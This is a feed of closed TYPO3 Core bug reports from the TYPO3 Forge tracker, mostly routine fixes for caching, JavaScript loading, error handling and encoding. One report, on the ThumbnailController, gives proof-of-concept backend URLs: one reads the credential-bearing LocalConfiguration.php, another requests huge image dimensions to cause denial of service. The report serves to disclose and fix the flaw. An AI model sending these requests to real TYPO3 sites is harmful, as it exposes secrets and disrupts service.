TYPO3 Forge: Issueshttp://forge.typo3.org/http://forge.typo3.org/themes/typo3_forge/favicon/favicon.png?17058661692018-11-14T08:50:52ZTYPO3 Forge
Redmine TYPO3 Core - Bug #86923 (Closed): Symfony expressions/conditions doesn't work in user-tsconfighttp://forge.typo3.org/issues/869232018-11-14T08:50:52ZOliver Haderoliver.hader@typo3.orgTYPO3 Core - Bug #85875 (Closed): Issues in ThumbnailControllerhttp://forge.typo3.org/issues/858752018-08-16T18:33:06ZOliver Haderoliver.hader@typo3.org
<ul>
<li>information disclosure (fileIdentifier can be arbitrary, supports fallback zero-storage)</li>
<li>denial of service (dimensions, basically whole configuration can be arbitrary)</li>
</ul>
<p>Introduced in <a class="external" href="https://review.typo3.org/#/c/56765/">https://review.typo3.org/#/c/56765/</a> - not released yet to 9.4.0 nor 8.7.19</p>
<p>Solution: Add HMAC to all HTTP request parameters.</p>
<a name="PoC"></a>
<h2 >PoC<a href="#PoC" class="wiki-anchor">¶</a></h2>
<p>XSRF Token has to be adjusted in the links below</p>
<a name="Information-Disclosure"></a>
<h3 >Information Disclosure<a href="#Information-Disclosure" class="wiki-anchor">¶</a></h3>
<pre>
http://ip9.local/typo3/index.php?route=%2Fthumbnails&token=f956bed9f5fa218860ef00491b37d9ede93b7731
&fileIdentifier=typo3conf/LocalConfiguration.php&processingInstructions%5Bwidth%5D=64
&processingInstructions%5Bheight%5D=64c
&processingInstructions%5Bcrop%5D=
</pre>
<a name="Denial-of-Service"></a>
<h3 >Denial of Service<a href="#Denial-of-Service" class="wiki-anchor">¶</a></h3>
<pre>
http://ip9.local/typo3/index.php?route=%2Fthumbnails&token=f956bed9f5fa218860ef00491b37d9ede93b7731
&fileIdentifier=1%3A%2Fuser_upload%2Fafter_01.png
&processingInstructions%5Bwidth%5D=1000000
&processingInstructions%5Bheight%5D=1000000c
&processingInstructions%5Bcrop%5D=
</pre> TYPO3 Core - Bug #85773 (Closed): Flaws in sys_log entry IP anonymizationhttp://forge.typo3.org/issues/857732018-08-07T14:22:19ZOliver Haderoliver.hader@typo3.org
The sys_log entry IP anonymization has several flaws which lead to a revert of the initial change in master:
<ul>
<li>REMOTE_ADDR is anonymized, REMOTE_HOST not (probably there are more occurrences)</li>
<li>PHP method <code>sprintf()</code> is invoked with too many arguments, username information is out of bounds</li>
<li>introduced in <a class="external" href="https://review.typo3.org/#/c/57313/">https://review.typo3.org/#/c/57313/</a></li>
</ul> TYPO3 Core - Bug #55246 (Closed): Class 'TYPO3\CMS\Recordlist\Browser\GeneralUtility' not foundhttp://forge.typo3.org/issues/552462014-01-22T14:37:05ZOliver Haderoliver.hader@typo3.org
<p><code>Class 'TYPO3\CMS\Recordlist\Browser\GeneralUtility' not found in typo3/branches/TYPO3_6-1/typo3/sysext/recordlist/Classes/Browser/ElementBrowser.php on line 704</code></p> TYPO3 Core - Bug #46205 (Closed): Cache file could not be written on concurrent actionshttp://forge.typo3.org/issues/462052013-03-12T15:30:34ZOliver Haderoliver.hader@typo3.org
<p>I get several errors like</p>
<p><code>The cache file "htdocs/typo3temp/Cache/Data/t3lib_l10n/3e2cbbda0301cf592e5831ef26c56b7b" could not be written.</code></p>
<p>This happens while a scheduler process is running that imports data using t3lib_TCEmain/DataHandler an I'm trying to work in the backend.<br />I consider this kind of a race condition that e.g. in this case language caches are flushed too often if a new record gets persisted in the DataHandler.</p>
<p>I can reproduce this on my local machine (Mac OS X) and a staging server with Ubuntu 12.04.</p> TYPO3 Core - Bug #31249 (Closed): Caching tables of new extensions are not createdhttp://forge.typo3.org/issues/312492011-10-25T00:34:19ZOliver Haderoliver.hader@typo3.org
<p>Creating the caching tables of an extension that has been installed in the same process does not work.<br />Since the cachingConfiguration of the new extension is not forwarded to the cache manager, the new tables are just not know there.</p> TYPO3 Core - Bug #23287 (Closed): Clearing caches in backend only displays empty framehttp://forge.typo3.org/issues/232872010-07-28T14:52:00ZOliver Haderoliver.hader@typo3.org
<p>Clearing caches in backend only displays empty frame - applies for the typo3conf and the frontend cache.</p>
<p>(issue imported from #M15263)</p> TYPO3 Core - Bug #21168 (Closed): Improve the error and exception handlinghttp://forge.typo3.org/issues/211682009-10-01T14:24:37ZOliver Haderoliver.hader@typo3.org
<p>Problem:<br />The new errorhandling in TYPO3 is way too unflexible.<br />- Errors are "converted" to exceptions. This is not very useful because every php warning will be turned into an exception. and will stop the script execution.<br />- DIsplayed error break the backend layout and make forms unusable<br />- Errors and exceptions are only displayed, but there's no build-in possibility to write errors and exception to a log.</p>
<p>Solution(s):<br />- introduce a new parameter for errors which should be handled by the error handler. The already existing parameter "exceptionalErrors" is used only for the error which should throw exceptions.<br />- Display the errors as flashmessages in the BE and as TsLog messages in FE (in the adminpanel)<br />- implement logging of errors and exceptions to the different logging systems TYPO3</p>
<p>Documentation:<br /><a class="external" href="http://wiki.typo3.org/index.php/File:Error_and_exception_handling.odt">http://wiki.typo3.org/index.php/File:Error_and_exception_handling.odt</a></p>
<p>(issue imported from #M12093)</p> TYPO3 Core - Bug #21078 (Closed): Optimize disposal of t3lib_PageRendererhttp://forge.typo3.org/issues/210782009-09-17T17:08:41ZOliver Haderoliver.hader@typo3.org
<p>t3lib_PageRenderer is currently used in the TYPO3 backend and frontend. There the classes template and tslib_fe inherit from t3lib_PageRenderer. However, in frontend disposal it's not required to have the feature set of the page renderer loaded if a request gets served by the cache and nothing is rendered at all.</p>
<p>Thus, instead of using "tslib_fe extends t3lib_PageRenderer", an aggreation shall be used.<br />Extension can then access the page renderer e.g. by $TSFE->getPageRenderer()->addJsFile()</p>
<p>(issue imported from #M11985)</p> TYPO3 Core - Bug #19530 (Closed): Store OpenID information in database instead of using the files...http://forge.typo3.org/issues/195302008-10-30T11:11:28ZOliver Haderoliver.hader@typo3.org
<p>The OpenID information currently gets stored in the filesystem. Due to security reasons it's preferred to have that sensible data in the database.</p>
<p>The file to be changed is class.tx_openid_sv1.php</p>
<p>(issue imported from #M9683)</p> TYPO3 Core - Bug #19496 (Closed): Flexform sections are not working anymore since script.aculo.us...http://forge.typo3.org/issues/194962008-10-22T16:41:47ZOliver Haderoliver.hader@typo3.org
<p>Due to a change of loading JavaScript resources between TYPO3 4.2.1 and 4.2.2 the script.aculo.us JavaScript framework now only gets loaded when it is required (before it was always loaded).</p>
<p>The solution is to explicitely load script.aculo.us when flexform sections are being rendered.</p>
<p>(issue imported from #M9623)</p> TYPO3 Core - Bug #19485 (Closed): Frontend Editing does not work anymorehttp://forge.typo3.org/issues/194852008-10-21T10:51:06ZOliver Haderoliver.hader@typo3.org
<p>Due to a change of loading JavaScript libraries in the back-end by a commond handler function, the front-end editing does not work anymore and shows the following PHP error:</p>
<p>Fatal error: Call to undefined method stdClass::loadJavascriptLib() in t3lib/class.t3lib_tceforms.phpon line 5079</p>
<p>(issue imported from #M9608)</p> TYPO3 Core - Feature #17500 (Closed): Localization of child recordshttp://forge.typo3.org/issues/175002007-08-06T20:58:11ZOliver Haderoliver.hader@typo3.org
<p>The localization of child records when viewing the parent record isn't possible. This is a missing feature of TYPO3 4.1.</p>
<p>(issue imported from #M6087)</p> TYPO3 Core - Bug #17001 (Closed): config.linkVars check doesn't allow negative rangeshttp://forge.typo3.org/issues/170012007-02-17T11:05:42ZOliver Haderoliver.hader@typo3.org
<p>The newly introduced linkVars check in TYPO3 4.1 doesn't allow negative ranges.</p>
<p>Example:<br />config.linkVars = my_variable(1-5) is valid<br />config.linkVars = my_variable(-1-5) doesn't work<br />config.linkVars = my_variable(-1--3) doesn't work and looks very ugly</p>
<p>I suggest to use ".." as delimiter, e.g.<br />config.linVars = my_variable(-1..-3)</p>
<p>Possibly it is allowed in TYPO3 4.2 to use config.linkVars = tx_myext_pi1[var](<del>1..-3), but we should change the delimiter from "</del>" to ".." now.<br />(issue imported from #M5009)</p> TYPO3 Core - Bug #16875 (Closed): Wrong character encoding in new child records created via AJAX ...http://forge.typo3.org/issues/168752007-01-21T15:05:47ZOliver Haderoliver.hader@typo3.org
<p>If a new child record was created dynamically using an AJAX call. Umlauts like "äöüß" were not displayed correctly due to a missing character encoding.</p>
<p>(issue imported from #M4820)</p>